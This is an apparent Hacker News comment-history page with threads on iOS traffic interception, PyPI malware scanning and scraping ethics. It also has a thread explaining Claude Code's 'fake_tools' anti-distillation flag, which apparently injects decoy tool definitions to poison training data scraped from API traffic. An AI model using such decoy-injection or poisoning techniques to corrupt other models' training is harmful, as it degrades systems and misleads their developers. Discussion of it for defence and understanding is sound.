More

cedws · 2026-04-01T03:46:55 1775015215

Installing the CA requires jumping through some hoops, but yes, intercepting traffic for apps that don’t use cert pinning isn’t that difficult on iOS.

Apps that do use cert pinning is a whole other matter, I’ve tried unsuccessfully a few times to inspect things like banking apps. Needs a rooted device at the minimum.

funman7 · 2026-04-01T04:25:18 1775017518

So I assume the white house app doesn’t do cert pinning

Also looked into this a long time ago… could someone tell me how to do this with cert pinned apps ?

cedws · 2026-03-31T10:28:29 1774952909

    ANTI_DISTILLATION_CC
    
    This is Anthropic's anti-distillation defence baked into Claude Code. When enabled, it injects anti_distillation: ['fake_tools'] into every API request, which causes the server to silently slip decoy tool definitions into the model's system prompt. The goal: if someone is scraping Claude Code's API traffic to train a competing model, the poisoned training data makes that distillation attempt less useful.

jjcm · 2026-03-31T18:37:47 1774982267

It looks like it worked, fwiw.

The qwen 27b model distilled on Opus 4.6 has some known issues with tool use specifically: https://x.com/KyleHessling1/status/2038695344339611783

Fascinating.

3form · 2026-03-31T17:50:54 1774979454

I was thinking just yesterday that the research that Anthropic was sharing regarding how it's easy to poison training was unlikely to be conducted out of goodness of the heart.

mmaunder · 2026-03-31T14:43:41 1774968221

Haven’t looked at the code, but is the server providing the client with a system prompt that it can use, which would contain fake tool definitions when this is enabled? What enables it? And why is the client still functional when it’s giving the server back a system prompt with fake tool definitions? Is the LLM trained to ignore those definitions?

Wonder if they’re also poisoning Sonnet or Opus directly generating simulated agentic conversations.

cedws · 2026-03-31T15:33:50 1774971230

Not sure, and not completely convinced of the explanation, but the way this sticks out so obviously makes it look like a honeypot to me.

mmaunder · 2026-03-31T19:13:13 1774984393

Great theory. I'll dig deeper.

mmaunder · 2026-03-31T19:31:50 1774985510

Claude Code has a server-side anti-distillation opt-in called fake_tools, but the local code does not show the actual mechanism.

The client sometimes sends anti_distillation: ['fake_tools'] in the request body at services/api/claude.ts:301

The client still sends its normal real tools: allTools at services/api/claude.ts:1711

If the model emits a tool name the client does not actually have, the client turns that into No such tool available errors at services/tools/StreamingToolExecutor.ts:77 and services/tools/toolExecution.ts:369

If Anthropic were literally appending extra normal tool definitions to the live tool set, and Claude used them, that would be user-visible breakage.

That leaves a few more plausible possibilities:

Fake_tools is just the name of the server-side experiment, but the implementation is subtler than “append fake tools to the real tool list.”

or

The server may inject tool-looking text into hidden prompt context, with separate hidden instructions not to call it.

or

The server may use decoys only in an internal representation that is useful for poisoning traces/training data but not exposed as real executable tools.

cedws · 2026-03-31T19:42:38 1774986158

We do know that Anthropic has the ability to detect when their models are being distilled, so there could be some backend mechanism that needs to be tripped to observe certain behaviour. Not possible to confirm though.

mmaunder · 2026-03-31T20:20:13 1774988413

Who's we, and how do you know this?

BoorishBears · 2026-03-31T23:42:38 1775000558

We can be used to refer to people in general, and we know because Anthropic published a post called "Detecting and preventing distillation attacks" a month ago, while calling out 3 AI labs for large scale distillation

https://www.anthropic.com/news/detecting-and-preventing-dist...

GorbachevyChase · 2026-03-31T17:42:13 1774978933

I like these guys less every day. The rate limits are so low they are close to not even useful as a provider.

cedws · 2026-03-31T19:33:37 1774985617

It made me raise my eyebrows when everyone was rushing to jump to Claude because OpenAI agreed to work with the DoW. Both companies are just as shitty as each other and will resort to underhanded tactics to stay on top.

Go China to be honest. They're the most committed to open AI research and they have more interesting constraints to work under, like restricted access to NVIDIA hardware.

crazylogger · 2026-03-31T14:18:39 1774966719

Why would this be in the client code though?

nialse · 2026-03-31T12:51:42 1774961502

Paranoia. And also ironic considering their base LLM is a distillation of the web and books etc etc.

petcat · 2026-03-31T13:00:24 1774962024

They stole everything and now they want to close the gates behind them.

"I got the loot, Steve!"

I feel like the distillation stuff will end up in court if they try to sue an American company about it. We'll see what a judge says.

arcfour · 2026-03-31T13:47:57 1774964877

You're perfectly free to scrape the web yourself and train your own model. You're not free to let Anthropic do that work for you, because they don't want you to, because it cost them a lot of time and money and secret sauce presumably filtering it for quality and other stuff.

Stole? Courts have ruled it's transformative, and it very obviously is.

AI doomerism is exhausting, and I don't even use AI that much, it's just annoying to see people who want to find any reason they can to moan.

petcat · 2026-03-31T13:58:53 1774965533

> Stole? Courts have ruled it's transformative, and it very obviously is.

The courts have ruled that AI outputs are not copyrightable. The courts have also ruled that scraping by itself is not illegal, only maybe against a Terms of Service. Therefore, Anthropic, OpenAI, Google, etc. have no legal claim to any proprietary protections of their model outputs.

So we have two things that are true:

1) Anthropic (certainly) violated numerous TOS by scraping all of the internet, not just public content.

2) Scraping Anthropic's model outputs is no different than what Anthropic already did. Only a TOS violation.

dpark · 2026-03-31T15:41:45 1774971705

> 2) Scraping Anthropic's model outputs is no different than what Anthropic already did. Only a TOS violation.

Regardless of whether LLM training amounts to theft, thieves are still allowed to put locks on their own doors.

gruez · 2026-03-31T15:32:17 1774971137

>The courts have ruled that AI outputs are not copyrightable.

"not copyrightable" doesn't imply they can't frustrate attempts to scrape data.

petcat · 2026-03-31T15:44:53 1774971893

Nobody is saying they can't try to stop you themselves. That's where the Terms of Service violation part comes in. They can cancel your account, block your IP, etc. They just can't legally stop you by, for instance, compelling a judge to order you to stop.

dpark · 2026-03-31T15:56:10 1774972570

> They just can't legally stop you by, for instance, compelling a judge to order you to stop.

They probably can, actually. TOS are legally binding.

More likely they would block you rather than pursuing legal avenues but they certainly could.

petcat · 2026-03-31T16:16:01 1774973761

The Supreme Court already ruled on this. Scraping public data, or data that you are authorized to access, is not a violation of the Computer Fraud and Abuse Act.

Now, if you try to get around attempts to block your access, then yes you could be in legal trouble. But that's not what is happening here. These are people/companies that have Claude accounts in good standing and are authorized by Anthropic to access the data.

Nobody is saying that Anthropic can't just block them though, and they are certainly trying.

dpark · 2026-03-31T16:30:40 1774974640

I didn’t say anything about the computer fraud and abuse act. TOS are legally binding contracts in their own right if implemented correctly.

alpha_squared · 2026-03-31T15:02:24 1774969344

> You're perfectly free to scrape the web yourself and train your own model.

Actually, not anymore as a result of OpenAI and Anthropic's scraping. For example, Reddit came down hard on access to their APIs as a response to ChatGPT's release and the news that LLMs were built atop of scraping the open web. Most of the web today is not as open as before as a result of scraping for LLM data. So, no, no one is perfectly free to scrape the web anymore because open access is dying.

two_tasty · 2026-03-31T14:54:54 1774968894

"...free to scrape the web yourself and train your own model."

Yes, rich and poor are equally forbidden from sleeping under bridges.

kspacewalk2 · 2026-03-31T15:00:29 1774969229

Meaning what? The poor gets to sleep in the guest room of the rich guy's house because muh inequality?

Anthropic paid a lot of money for a moat and want to guard it. It is not wrong, in any sense of the word, for them to do so.

salawat · 2026-03-31T15:42:08 1774971728

Rich people aren't going to find themselves needing to sleep under a bridge, so the law really only exists as a constraint on the poor. Duh. The flex that "well a rich guy couldn't do it either" is A) at best a myopic misunderstanding perpetuated by out of touch people and B) hopelessly naive, because anny punishment for the rich guy actually sleeping under a bridge is so laughably small it may as well not even exist. Hence, the whole bit of "a legal system to keep these accountable, but not for me".

kspacewalk2 · 2026-03-31T16:30:06 1774974606

Okay, you explained what Anatole France meant, which is probably helpful for those few who didn't get it from the quote itself. Perhaps now you can explain what on earth this has to do with Anthropic not wanting to let other for-profit businesses mooch off its investment of time, brainpower and money?

dpark · 2026-03-31T15:48:20 1774972100

You explained what “rich and poor are equally forbidden from sleeping under bridges” means, but not what this has to do with the statement that one is free to do their own scraping and training, which I’m pretty sure is what kspacewalk was asking.

jtbayly · 2026-03-31T13:55:56 1774965356

Wut?They did exactly the same thing!

Try this: If you want to train a model, you’re free to write your own books and websites to feed into it. You’re not free to let others do that work for you because they don’t want you to, because it cost them a lot of time and money and secret sauce presumably filtering it for quality and other stuff.

arcfour · 2026-03-31T14:10:15 1774966215

[flagged]

buzzerbetrayed · 2026-03-31T14:24:40 1774967080

[flagged]

jollymonATX · 2026-03-31T15:45:03 1774971903

Yeah these folks skin is often very thin. One poke too hard and it's "whatever" and them scuttling off. Really hope there is a day they introspect.

arcfour · 2026-03-31T17:53:59 1774979639

I introspect all the time. I just disagree with you so I have thin skin? Lol.

I think it's transformative. I also think that it's a net positive for society. I lastly think that using freely available, public information is totally fair game. Piracy not so much, but it's water under the bridge.

I hope you introspect some day, too, and realize it's acceptable for people to have different views than you. That's why I don't care; you aren't going to change my mind and I can't change yours either, so it's moot and I don't care to argue about it further.

jollymonATX · 2026-03-31T19:21:20 1774984880

You had appeared to scuttle off but alas I was wrong (and sorry to imply you are a crab of some sort) however your comment followup on not changing minds might be a tad shell-ish. I'm open minded actually on the issue and these are major issues of our time. I'm personally impacted by this and it does make me wonder "will I write X thing again" and it is a very hard question to answer frankly. When you see your works presented in summary on search and a major decline in traffic you really do think about that. It impacts my ability to make money as I once did prior to 2024 (when it really hit) without doubt. Edit/spelling

airstrike · 2026-03-31T14:13:38 1774966418

Guess who else spent a lot of time and money and secret sauce?

Do you hear the words coming out of your mouth?

nunez · 2026-03-31T14:57:52 1774969072

Lol; like heck we are. Try scraping the NYTimes at LLM scale. You can time how quickly you’ll get 420’ed or, at worst, hit with a C&D.

nunez · 2026-03-31T17:31:30 1774978290

(429'ed, I meant)

andersonpico · 2026-03-31T15:45:39 1774971939

Your selective respect for work is a glaring double standard. The effort to produce the original content they scraped is order of magnitudes bigger than what it took to train the model, so if this wasn't enough to protect the authors from Anthropic it shouldn't be enough to protected Anthropic from people distillating their models.

Your legal argument is all over the place as well. What is more relevant here: what the courts ruled or what you consider obvious? How is distillation less transformative than scraping? How does courts ruling that scraping to train models is legal relate to distillation?

Nobody is scoring you on neutrality points for not using AI much and calling this doomerism is just a thought-terminating cliche that refuses to engage with the comment you're replying.

In fact, your comment is not engaging with anything at all, you're vaguely gesturing towards potentitial arguments without making them. If you find discussing this exhausting then don't but also don't flood the comments with low effort whining.

hax0ron3 · 2026-03-31T21:01:56 1774990916

It is transformative, but if I make a bunch of requests to their API and use the responses to distill my own model, that is also transformative.

loremium · 2026-03-31T16:14:31 1774973671

reminds me of `don't look up` a bit. there clearly is an imbalance in regards to licenses with model providers, not even talking about knowledge extraction (yes younger people don't learn properly now, older generations forget) shortly before the rug-pull happens in form of accessibility to not rich people

unethical_ban · 2026-03-31T14:16:38 1774966598

Let's talk ethics, not law. Why is it okay for these companies to pirate books and scrape the entire web and offer synthesized summaries of all of it, lowering traffic and revenue for countless websites and professions of experts, but it is not okay for others to try to do the same to an AI model?

Is the work of others less valid than the work of a model?

gruez · 2026-03-31T15:48:07 1774972087

>Why is it okay for these companies to pirate books

Courts have ruled it's not, and I don't think anyone is arguing it's okay.

>but it is not okay for others to try to do the same to an AI model?

The steelman version is that it's okay to do it once you acquired the data somehow, but that doesn't mean anthropic can't set up roadblocks to frustrate you.

p1esk · 2026-03-31T14:38:41 1774967921

I don’t see why it’s not ok to do that to an AI model. Or are you asking why they don’t want you to do it?

sfn42 · 2026-03-31T14:49:19 1774968559

I don't think anyone's saying it's not okay - I think the point is that Anthropic has every right to create safeguards against it if they want to - just like the people publishing other information are free to do the same.

And everyone is free to consume all the free information.

olalonde · 2026-03-31T14:24:29 1774967069

Also, begging to get "regulated":

https://x.com/TheChiefNerd/status/2038565951268946021

Andrex · 2026-03-31T15:23:19 1774970599

I just rewatched that scene last night on YouTube. Maybe this is the universe telling me to watch the whole movie again...

It's cool to see Noah Wyle getting his due these days (The Pitt).

dpark · 2026-03-31T15:38:23 1774971503

[flagged]

petcat · 2026-03-31T15:42:20 1774971740

Not every lawsuit goes to court, or results in a decision. I'm sure you know that.

dpark · 2026-03-31T15:44:14 1774971854

You should ask Claude what a lawsuit is. Or perhaps you mean “trial” and not “court”?

cryptonector · 2026-03-31T15:48:32 1774972112

Not every lawsuit that is heard by a court goes to trial.

dpark · 2026-03-31T15:52:37 1774972357

Right. This was strongly implied by my comment.

petcat · 2026-03-31T15:46:32 1774971992

I feel like I'm talking to Claude right now. Am I?

dpark · 2026-03-31T15:50:08 1774972208

This is the new “I can’t defend my statement online” retort, huh?

“Well I might be wrong but at least I’m not AI like YOU!”

petcat · 2026-03-31T16:17:20 1774973840

Ever heard the phrase "settled out of court"? A lot of lawsuits are settled even before a court clerk processes the paperwork.

squeaky-clean · 2026-03-31T16:57:09 1774976229

Settled out of court does not mean the lawsuit never went to court. It means the settlement happened outside of court. Every lawsuit has to go to court, that's how you file a lawsuit. If it isn't sent to a court it's just words in a document.

dpark · 2026-03-31T16:28:37 1774974517

A lawsuit with no paperwork filed is not a lawsuit. That’s just an agreement.

Again, you seem to be conflating lawsuit with trial.

v8xi · 2026-03-31T16:20:15 1774974015

next you should explain idioms

sheept · 2026-03-31T15:06:05 1774969565

It's not really paranoia if it's happening a lot. They wrote a blog post calling several major Chinese AI companies out for distillation.[0] Perhaps it is ironic, but it's within their rights to protect their business, like how they prohibit using Claude Code to make your own Claude Code.[1]

[0]: https://www.anthropic.com/news/detecting-and-preventing-dist... [1]: https://news.ycombinator.com/item?id=46578701

gmerc · 2026-03-31T17:17:59 1774977479

And conveniently left out they themselves distilled DeepSeek for chinese content into their model....

salawat · 2026-03-31T15:53:16 1774972396

Their business shouldn't exist. It was predisposed on non-permissive IP theft. They may have found a judge willing to cop to it not being so, but the rest of the public knows the real score. And most problematically for them, that means the subset of hackerdom that lives by tit-for-tat. One should beware of pissing off gray-hats. Iit's a surefire way to find yourself heading for bad times.

jaccola · 2026-03-31T14:27:52 1774967272

I would say not all that ironic. Book publishers, Reddit, Stackoverflow, etc., tried their best to attract customers while not letting others steal their work. Now Anthropic is doing the same.

Unfortunately (for the publishers, at least) it didn't work to stop Anthropic and Anthropic's attempts to prevent others will not work either; there has been much distillation already.

The problem of letting humans read your work but not bots is just impossible to solve perfectly. The more you restrict bots, the more you end up restricting humans, and those humans will go use a competitor when they become pissed off.

brookst · 2026-03-31T15:42:42 1774971762

It's really just tech culture like HN that obsesses over solving problems perfectly. From seat belts to DRM to deodorant, most of the world is satisfied with mitigating problems.

johnfn · 2026-03-31T14:30:04 1774967404

It is absolutely not paranoia. People are distilling Claude code all the time.

spiderfarmer · 2026-03-31T13:00:33 1774962033

That isn't irony, it's hypocrisy.

snapcaster · 2026-03-31T13:46:05 1774964765

No it isn't. It's a competition, making moves that benefit you and attempting to deprive your opponent of the same move is just called competing

brookst · 2026-03-31T15:44:57 1774971897

Wait, are you saying that it's not hypocritical for my chess opponent to try to protect their king while trying to kill mine? :mind-blown:

Tech people are funny, with these takes that businesses do/should adhere to absolute platonic ideals and follow them blindly regardless of context.

salawat · 2026-03-31T15:58:23 1774972703

No, it's ethical people pointing out that if you toss aside ethics for success at all costs, you aren't going to find any sympathy when people start doing the same thing back to you. Live by the sword, die by the sword, as they say.

There is a reason we don't do things. That reason is it makes the world a worse place for everyone. If you are so incredibly out of touch with any semblance of ethics at all; mayhaps you are just a little bit part of the problem.

brookst · 2026-03-31T16:01:29 1774972889

The funny thing about ethics is there is no absolute, which makes some people uncomfortable. Is it ethical to slice someone with a knife? Does it depend if you're a surgeon or not?

Absolutism + reductionism leads to this kind of nonsense. It is possible that people can disagree about (re)use of culture, including music and print. Therefore it is possible for nuance and context to matter.

Life is a lot easier if you subscribe to a "anyone who disagrees with me on any topic must have no ethics whatsoever and is a BAD person." But it's really not an especially mature worldview.

salawat · 2026-03-31T16:26:03 1774974363

Categorical imperative and Golden Rule, or as you may know it from game theory "tit-for-tat" says "hi". The beautiful thing about ethics is that we philosophers intentionally teach it descriptively, but encourage one to choose their own based on context invariance. What this does is create an effective litmus test for detecting shitty people/behavior. You grasping on for dear life to "there's no absolutes" is an act of self-soothing on your own part as you're trying to rationalize your own behavior to provide an ego crumple zone. I, on the other hand, don't intend to leave you that option. That you're having to do it is a Neon sign of your own unethicality in this matter. We get to have nice things when people moderate themselves (we tolerate eventual free access to everything as long as the people who don't want to pay for it don't go and try to replace us economically at scale). When people abuse that, (scrape the Internet, try to sell work product in a way that jeopardizes the environment we create in) the nice thing starts going away, and you've made the world worse.

Welcome to life bucko. Stop being a shitty person and get with the program so we have something to leave behind that has a chance of not making us villains in the eyes of those we eventually leave behind. The trick is doing things the harder way because it's the right way to do it. Not doing it the wrong way because you're pretty sure you can get away with it.

But you're already ethically compromised, so I don't really expect this to do any good except to maybe make the part of you you pointedly ignore start to stir assuming you haven't completely given yourself up to a life of ne'er-do-wellry. Enjoy the enantidromia. Failing that, karma's a bitch.

vor_ · 2026-03-31T20:58:46 1774990726

It's definitely still hypocrisy.

keybored · 2026-03-31T13:10:00 1774962600

The Golden Horde didn’t want opponents to conquer their territory. An irony if you think about it—

croes · 2026-03-31T13:08:54 1774962534

That’s capitalism

dmix · 2026-03-31T13:36:31 1774964191

As opposed to the rent-seeking copyright industry where 1% goes to the original creators if you're lucky.

jitl · 2026-03-31T13:42:01 1774964521

That’s capitalism too

dmix · 2026-03-31T15:15:33 1774970133

Technically state-capitalism since it's an industry created as a result of congress regulating commerce with aggressive IP laws (aka rent-seeking)

brookst · 2026-03-31T15:45:41 1774971941

Where can I see an example of any other kind of capitalism?

dmix · 2026-04-01T00:09:25 1775002165

Capitalism is always underpinned by a strong legal system which is why most criticism is about constraining growth in legislation, not killing off interference outright. Copyright law is a good example of a law that made sense in it's original form but turned into a monster with scope-creep.

Although, if we're being realpolitik, every time government interference grows in scope and corrupts markets, capitalism still gets blamed and people call for more government to fix it (see: housing). So the capitalism vs state capitalism distinction isn't very meaningful in practice.

satvikpendem · 2026-03-31T13:44:40 1774964680

As opposed to what economic system that doesn't do this?

cedws · 2026-03-29T21:02:22 1774818142

I watched a talk from Bjarne Stroustrup at CppCon about safety and it was pretty second hand embarrassing watching him try to pretend C++ has always been safe and safety mattered all along to them before Rust came along.

einpoklum · 2026-03-29T21:52:23 1774821143

Well, there has been a long campaign against manual memory management - well before Rust was a thing. And along with that, a push for less use of raw pointers, less index loops etc. - all measures which, when adopted, reduce memory safety hazards significantly. Following the Core Guideliness also helps, as does using span's. Compiler warnings has improved, as has static analysis, also in a long process preceding Rust.

Of course, this is not completely guaranteed safety - but safety has certainly mattered.

cedws · 2026-03-29T22:54:28 1774824868

>Following the Core Guideliness also helps

Yes, this what Stroustrup said and it makes me laugh. IIRC he phrased with a more of a 'we had safety before Rust' attitude. It also misses the point, safety shouldn't be opt-in or require memorising a rulebook. If safety is that easy in C++ why is everyone still sticking their hand in the shredder?

einpoklum · 2026-03-30T12:34:13 1774874053

You're "moving the goal posts" of this thread. Safety has mattered - in C++ and in other languages as well, e.g. with MISRA C.

As for the Core Guidelines - most of them are not about safety; and - they are not to be memorized, but a resource to consult when relevant, and something to base static analysis on.

cedws · 2026-03-29T18:18:24 1774808304

Because they don’t work with it. It’s a simple as that. I don’t trust people who don’t work with a terminal these days, the further they get from a terminal, the less grounded their views are. They rely on hearsay and CEO hype. To make matters worse, they say whatever they think will earn them a bonus/promotion, which leads to a cascade of BS down the chain.

I seriously doubt Satya Nadella is sitting down for hours a day to use Copilot to draft detailed documents. He's being fed fantastical stories by his lackeys telling him what he wants to hear.

cedws · 2026-03-29T14:52:54 1774795974

I've seen this misconception so many times in open source projects - commits just bumping the version in go.mod to 'get the latest performance and security improvements.' Like no, that's not how it works, you just made your code compile with fewer compiler versions for no reason.

I think the directive could have been named better though, maybe something like min_version.

cedws · 2026-03-27T23:53:34 1774655614

Are you able to share if there's a general trend behind the outages? Do you often hit capacity, or do you budget to have headroom?

palcu · 2026-03-28T09:04:37 1774688677

Yes, the general trend is the unprecedented growth that we've seen. Typically one would have some time in advance to re-engineer the systems to support the increased in traffic and users. But we're dealing with very compressed timelines and while most of the time we're able to fix the issues beforehand, sometimes we have to do them in production. Sorry for that.

cedws · 2026-03-27T21:15:14 1774646114

The US under Trump is behaving exactly like a country with intentions of damaging the Western order and antagonising enemies to open new front lines. I think writing off Trump's actions as stupid is wrong, he's malicious.

herbst · 2026-03-28T08:56:46 1774688206

Also making new enemies in their own row of allies. That can't be a side effect on how efficient he is doing it.

cedws · 2026-03-26T16:13:47 1774541627

GitHub, npm, PyPi, and other package registries should consider exposing a firehose to allow people to do realtime security analysis of events. There are definitely scanners that would have caught this attack immediately, they just need a way to be informed of updates.

simonw · 2026-03-26T16:28:51 1774542531

PyPI does exactly that, and it's been very effective. Security partners can scan packages and use the invite-only API to report them: https://blog.pypi.org/posts/2024-03-06-malware-reporting-evo...

staticassertion · 2026-03-26T16:38:23 1774543103

PyPI is pretty best-in-class here and I think that they should be seen as the example for others to pursue.

The client side tooling needs work, but that's a major effort in and of itself.

charcircuit · 2026-03-26T17:26:38 1774545998

It is not effective if it just takes a simple base64 encode to bypass. If Claude is trivially able to find that it is malicious then Pypi is being negligent.

simonw · 2026-03-26T17:41:15 1774546875

The package in question was live for 46 minutes. It generally takes longer than that for security partners to scan and flag packages.

PyPI doesn't block package uploads awaiting security scanning - that would be a bad idea for a number of reasons, most notably (in my opinion) that it would be making promises that PyPI couldn't keep and lull people into a false sense of security.

charcircuit · 2026-03-26T19:17:49 1774552669

It should not let people download unscanned dependencies without a warning and asking the user to override and use a potentially insecure package. If such security bug is critical enough to need to bypass this time (spoiler: realistically it is not actually that bad for a security fix to be delayed) they can work with the pypi security team to do a quicker manual review of the change.

tsimionescu · 2026-03-27T05:59:36 1774591176

The whole point is that this would give a false sense of security. Scanned dependencies aren't secure, they're just scanned by some tools which might catch some issues. If you care about security, you need to run those same scans on your side, perhaps with many more rules enabled, perhaps with multiple tools. PyPI, understandably, does NOT want to take any steps to make it seem like they promise their repo doesn't contain any malware. They make various best effort attempts to keep it that way, but the responsibility ultimately falls on you, not on them.

Reddit_MLP2 · 2026-03-26T21:18:07 1774559887

sadly I still worry about that. An install fails once, you you hard code the --force flag in all your CI/CD jobs and we are back in the same place again. I am not sure what the answer is, though problems...

charcircuit · 2026-03-26T21:28:14 1774560494

Adding a hardcoded flag is not the same as asking the user if they want potential malware. If CI/CD is broken they should revert the change to pinned dependencies instead of trying to install a bleeding edge version of a new dependency that hasn't been scanned yet.

yjk · 2026-03-26T22:59:37 1774565977

I don't understand why this would be an issue. Firstly, you could just pin your dependencies, but even if you don't, couldn't the default behaviour be to just install the newest scanned version?

simonw · 2026-03-26T21:24:24 1774560264

What happens then if the security scanners say something is safe and it turns out not to be?

I don't think PyPI should be in the business of saying if a piece of software is safe to install or not.

charcircuit · 2026-03-26T21:47:42 1774561662

Then it will be downloadable and then it's up to your own security scanners to catch it. If you find it, it should be reported to pypi and then the scanner should be improved to catch that kind of bypass the next time it comes around. In such a world I don't think pypi is acting negligent.

simonw · 2026-03-26T23:13:29 1774566809

That's really not very different from what we have right now. PyPI works with scanners which catch a whole lot of malware and are getting better all the time.

I think PyPI suggesting that software is safe would be a step down from this because it make promises that PyPI can't keep, and would encourage a false sense of security.

charcircuit · 2026-03-27T00:32:32 1774571552

It's less about suggesting that it's safe, and more about avoiding pushing out arbitrary code to thousands of people without checking if you are pushing out malicious code to all of those people. It is the responsible thing to do.

>That's really not very different from what we have right now.

What I'm advocating for is different enough to have stopped this malware from being pushed out to a bunch of people which at the very least would raise the bar of pulling off such an attack.

__mharrison__ · 2026-03-26T17:49:59 1774547399

I realize this is controversial (and many Python folks would claim anti ethical). But I keep wondering if requiring a small payment for registering and updating packages would help. The money could go to maintaining pypix as well as automated AI analysis. Folks who really couldn't afford it could apply for sponsorship.

simonw · 2026-03-26T18:03:35 1774548215

Very much not speaking for the PSF here, but my personal opinion on why that wouldn't work is that Python is a global language and collecting fees on a global basis is inherently difficult - and we don't want to discriminate against people in countries where the payment infrastructure is hard to support.

PyPI has paid organization accounts now which are beginning to form a meaningful revenue stream: https://docs.pypi.org/organization-accounts/pricing-and-paym...

Plus a small fee wouldn't deter malware authors, who would likely have easy access to stolen credit cards - which would expose PyPI to the chargebacks and fraudulent transactions world as well!

TheDong · 2026-03-26T18:29:28 1774549768

I don't think people want to pay for that.

If pypi charges money, python libraries will suddenly have a lot of "you can 'uv add git+https://github.com/project/library'" instead of 'uv add library'.

I also don't think it would stop this attack, where a token was stolen.

If someone's generating pypi package releases from CI, they're going to register a credit card on their account, make it so CI can automatically charge it, and when the CI token is stolen it can push an update on the real package owner's dime, not the attackers, so it's not a deterrent.

Also, the iOS app store is an okay counter example. It charges $100/year for a developer account, but still has its share of malware (certainly more than the totally free debian software repository).

__mharrison__ · 2026-03-26T19:28:24 1774553304

TBH there isn't much difference in pulling directly from GH.

Though I do like your Apple counterexample.

patrakov · 2026-03-27T12:21:45 1774614105

Not speaking on behalf of PSF, but to me, it looks like a no-go, as some packages are maintained, legitimately, by people from sanctioned countries, with no way to pay any amount outside their country.

kryptiskt · 2026-03-27T10:06:39 1774605999

I don't see how this would help in the least, what kind of criminal would be dissuaded by paying a small fee to set an elaborate scheme such as this in motion? This is not a spamming attack where the sheer volume would be costly. It doesn't even help to get a credit card on file, since they can use stolen CC numbers.

It's far more likely that hobbyists will be hurt than someone that can just write off the cost as a small expense for their criminal scheme.

zar1048576 · 2026-03-28T12:12:11 1774699931

I suspect that for a nation-state type threat actor, this wouldn’t be much of a deterrent. Any type of reputation system like this would work to a point until motivated threat actors find a way to game it.

toomuchtodo · 2026-03-26T18:26:45 1774549605

Would you happen to know where the latency comes from between upload and scanning? Would more resources for more security scanner runners to consume the scanner queue faster solve this? Trying to understand if there are inherent process limitations or if a donation for this compute would solve this gap.

(software supply chain security is a component of my work)

TheDong · 2026-03-26T18:34:14 1774550054

He said, "pypi doesn't block upload on scanning"; that's part of where the latency comes from. The other part is simply the sheer mass of uploads, and that there's not money in doing it super quickly.

I agree that's a bad idea to do so since security scanning is inherently a cat and mouse game.

Let's hypothetically say pypi did block upload on passing a security scan. The attacker now simply creates their own pypi test package ahead of time, uploads sample malicious payloads with additional layers of obfuscation until one passes the scan, and then uses that payload in the real attack.

Pypi would also probably open source any security scanning code it adds as part of upload (as it should), so the attacker could even just do it locally.

toomuchtodo · 2026-03-26T18:37:06 1774550226

I suppose my argument is that pypi could offer the option to block downloads to package owners until a security scan is complete (if scanning will always take ~45-60 minutes), and if money is a problem, money can solve the scanning latency. Our org scans all packages ingested into artifact storage and requires dependency pinning, and would continue to do so, but more options (when cheap) are sometimes better imho. Also, not everyone has enterprise resources for managing this risk. I agree it is "cat and mouse" or "whack-a-mole", and always will be (ie building and maintaining systems of risk mitigation and reduction). We don't not do security scanning simply because adversaries are always improving, right? We collectively slow attackers down, when possible.

("slow is smooth, smooth is fast")

simonw · 2026-03-26T20:04:13 1774555453

I don't know that myself but Mike Fiedler is the person to reach out to, he runs security for PyPI and is very responsive. security@pypi.org

cedws · 2026-03-26T16:44:58 1774543498

Thanks, TIL.

Fibonar · 2026-03-26T16:26:30 1774542390

So I've been thinking about this a lot since it happened. I've already added dependency cooldowns https://nesbitt.io/2026/03/04/package-managers-need-to-cool-... to every part of our monorepo. The obvious next thought is "am I just dumping the responsibility onto the next person along"? But as you point out it just needs to give automated scanners enough time to pick up on obvious signs like the .pth file in this case.

cedws · 2026-03-26T16:48:03 1774543683

It is in a sense dumping responsibility, but there’s a legion of security companies out there scanning for attacks all the time now to prove their products. They’re kind of doing a public service and you’re giving them a chance to catch attacks first. This is why I think dep cooldowns are great.

ImJasonH · 2026-03-26T22:03:23 1774562603

npm has a feed of package changes you can poll if you're interested.

GitHub has a firehose of events and there's a public BigQuery dataset built from that, with some lag.

ting0 · 2026-03-26T17:08:03 1774544883

I feel like they should be legally responsible for providing scanning infrastructure for this sort of thing. The potential economic damage can be catastrophic. I don't think this is the end of the litellm story either, given that 47k+ people were infected.

cedws · 2026-03-26T02:08:10 1774490890

It's not about expectation of work (well, there's some entitled people sure.)

It's about throwing away the effort the reporter put into filing the issue. Stale bots disincentivise good quality issues, makes them less discoverable, and creates the burden of having to collate discussion across N previously raised issues about the same thing.

Bug reports and FRs are also a form of work. They might have a selfish motive, but they're still raised with the intention of enriching the software in some way.

cedws · 2026-03-25T20:49:37 1774471777

It's like playing The Witness. Somebody should set LLMs loose on that.

throwaway613746 · 2026-03-25T23:57:57 1774483077

Or more appropriately - The Talos Principle.